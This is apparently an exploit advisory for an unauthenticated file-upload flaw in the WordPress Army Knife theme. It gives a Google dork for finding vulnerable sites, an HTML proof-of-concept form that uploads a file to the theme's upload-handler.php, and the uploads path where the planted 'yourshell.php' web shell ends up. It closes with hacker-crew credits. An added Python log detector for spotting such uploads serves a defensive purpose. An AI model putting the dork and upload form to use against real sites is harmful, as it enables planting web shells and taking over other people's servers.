WordPress Army Knife CSRF File Upload Vulnerability
Exploit Title: WordPress Army Knife CSRF File Upload Vulnerability
Author: Bebyyers404
Date: 11/09/2013
Vendor Homepage: http://freelancewp.co
Themes Link: http://freelancewp.com/wordpress-theme/army-knife/
Infected File: upload-handler.php
Category: webapps/php
Google dork: inurl:/wp-content/themes/armyknife
Tested on: Windows/Linux
Exploit PoC:
<form enctype="multipart/form-data"
action="http://127.0.0.1/wordpress/wp-content/themes/armyknife/functions/upload-handler.php" method="post">
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
File path:
http://127.0.0.1/wordpress/wp-content/uploads/[year]/[month]/yourshell.php
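Detection: the request pattern above leaves a recognisable trace in web server access logs. The following is an added example, not part of the original advisory; it flags POSTs to the handler and requests for script files under the dated uploads tree. The combined log format, the sample lines and the name `find_suspicious` are assumptions; the two paths are the ones listed above.

```python
import re

# Apache/nginx "combined" access log format is assumed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')
# Handler path from the advisory, under any install prefix.
HANDLER_RE = re.compile(
    r'/wp-content/themes/armyknife/functions/upload-handler\.php(?:\?|$)', re.I)
# Script files requested from the dated uploads tree (uploads/[year]/[month]/).
SCRIPT_RE = re.compile(
    r'/wp-content/uploads/\d{4}/\d{2}/[^/?]+\.(?:php\d?|phtml|phar)(?:\?|$)', re.I)

def find_suspicious(lines):
    """Return (line_no, client_ip, kind, path, status) for each hit."""
    findings, uploaders = [], set()
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, path, status = m["ip"], m["path"], m["status"]
        if m["method"] == "POST" and HANDLER_RE.search(path):
            uploaders.add(ip)
            findings.append((n, ip, "handler_post", path, status))
        elif SCRIPT_RE.search(path):
            # Stronger signal when the same client posted to the handler earlier.
            kind = "script_after_upload" if ip in uploaders else "script_in_uploads"
            findings.append((n, ip, kind, path, status))
    return findings

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Sep/2013:10:00:01 +0000] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [11/Sep/2013:10:00:05 +0000] "POST /wordpress/wp-content/themes/armyknife/functions/upload-handler.php HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [11/Sep/2013:10:00:09 +0000] "GET /wordpress/wp-content/uploads/2013/09/example.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Sep/2013:10:02:00 +0000] "GET /wordpress/wp-content/uploads/2013/09/photo.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Sep/2013:10:03:00 +0000] "GET /wordpress/wp-content/uploads/2013/08/test.phtml?x=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_LOG):
        print(*f)
```

Any POST to the handler path is worth triaging on its own, since a theme's upload endpoint should not be reachable by unauthenticated clients; a script request under uploads that returns 200 means the server executes files from that directory.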
./Nabilaholic404, ./Bebyyers404, ./Panda Dot ID, ./Tsunaomi48, ./Pscript ./Mbah-Rowo
JKT48 CYBER TEAM Black Devils Crew
Source: http://noob1t4.blogspot.com/